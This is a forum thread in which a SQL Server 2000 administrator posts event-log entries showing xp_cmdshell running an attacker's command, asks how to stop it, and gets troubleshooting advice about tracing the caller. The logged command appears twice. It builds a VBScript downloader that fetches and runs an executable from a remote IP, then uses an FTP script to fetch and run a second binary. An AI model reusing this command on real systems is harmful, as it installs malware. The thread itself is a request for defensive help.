cmd.exe processes.
Event viewer is full of events like:
8128 :
Using 'xplog70.dll' version '2000.80.760' to execute extended stored
procedure 'xp_cmdshell'.
the parameter cmd,exe was called:
C:\WINDOWS\system32\cmd.exe /c echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1
.
vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.
vbs&echo ExeURL = "http://172.22.21.181:9843/84785_mssql.exe">>c:\1.vbs&echo
LocalPath = "c:\msagent.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET =
CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data =
CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo
HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.[vbcol=seagreen
]
adSaveCreateOverWrite = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type =
adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.
ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath,
adSaveCreateOverWrite>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.
vbs&start c:\msagent.exe&echo open 172.22.21.181 17534>x&echo get 27031_mssq
l.
exe>>x&echo quit>>x&ftp -n -s:x&27031_mssql.exe&del x&exit
now i'm out of mind how to stop this.
Can anyone help me?SQL Server does not do this by itself. It is either a job or some applicatio
n that does this. I
suggest you use Profiler to track down who is calling these xp_cmdshell exec
utions.
Tibor Karaszi, SQL Server MVP
http://www.karaszi.com/sqlserver/default.asp
http://www.solidqualitylearning.com/
"bass_ua" <u30195@.uwe> wrote in message news:6ab4e8b03613c@.uwe...
>I have discovered recently that the sql server 2000 sp4 has spawned a lot o
f
> cmd.exe processes.
> Event viewer is full of events like:
> 8128 :
> Using 'xplog70.dll' version '2000.80.760' to execute extended stored
> procedure 'xp_cmdshell'.
> the parameter cmd,exe was called:
> C:\WINDOWS\system32\cmd.exe /c echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:
\1.
> vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.
> vbs&echo ExeURL = "http://172.22.21.181:9843/84785_mssql.exe">>c:\1.vbs&ec
ho
> LocalPath = "c:\msagent.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET =
> CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data
=
> CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&ech
o
> HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&ec
ho.
> adSaveCreateOverWrite = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type =
> adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.
> ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath,
> adSaveCreateOverWrite>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.
> vbs&start c:\msagent.exe&echo open 172.22.21.181 17534>x&echo get 27031_ms
sql.
> exe>>x&echo quit>>x&ftp -n -s:x&27031_mssql.exe&del x&exit
> now i'm out of mind how to stop this.
> Can anyone help me?
>|||"Tibor Karaszi" <tibor_please.no.email_karaszi@.hotmail.nomail.com> wrote in
message news:OtyZQntHHHA.2632@.TK2MSFTNGP06.phx.gbl...
> SQL Server does not do this by itself. It is either a job or some
> application that does this. I suggest you use Profiler to track down who
> is calling these xp_cmdshell executions.
'TRACK DOWN' ...is this a police action'
Ok, Rac uses xp_cmdshell and regularly. What do you want to do about it! ?
You wanna come and get me? You gonna bring the MVP brigade? Armed?
Well I'll be waiting for ya. I'm not frightened by the shell game.
-
best wishes for the holidays,
steve|||LOL
Bring it on, Steve. ;-)
> Ok, Rac uses xp_cmdshell and regularly.
Ahh, I didn't know that. You think this one was RAC? I tend to be suspicious
when I see a lot of
xp_cmdshell calls, but that it not the same as saying that there aren't good
/smart/valid reasons to
use it.
> best wishes for the holidays,
And the same to you! :-)
Tibor Karaszi, SQL Server MVP
http://www.karaszi.com/sqlserver/default.asp
http://www.solidqualitylearning.com/
"Steve Dassin" <steve@.nospamrac4sql.net> wrote in message
news:uK8aDjwHHHA.1264@.TK2MSFTNGP06.phx.gbl...
> "Tibor Karaszi" <tibor_please.no.email_karaszi@.hotmail.nomail.com> wrote i
n message
> news:OtyZQntHHHA.2632@.TK2MSFTNGP06.phx.gbl...
> 'TRACK DOWN' ...is this a police action'
> Ok, Rac uses xp_cmdshell and regularly. What do you want to do about it!
?
> You wanna come and get me? You gonna bring the MVP brigade? Armed?
> Well I'll be waiting for ya. I'm not frightened by the shell game.
>
> -
> best wishes for the holidays,
> steve
>|||Hi all, I'm fighting with exactly the same problem on my server. I've
tried everything I know without success. Do someone have an idea about
solving the problem ? Thanks
Marzio
Marzio Molinari
---
Marzio Molinari's Profile: http://unixadmintalk.com/798
View this thread: http://unixadmintalk.com/showthread.php?t=254838
No comments:
Post a Comment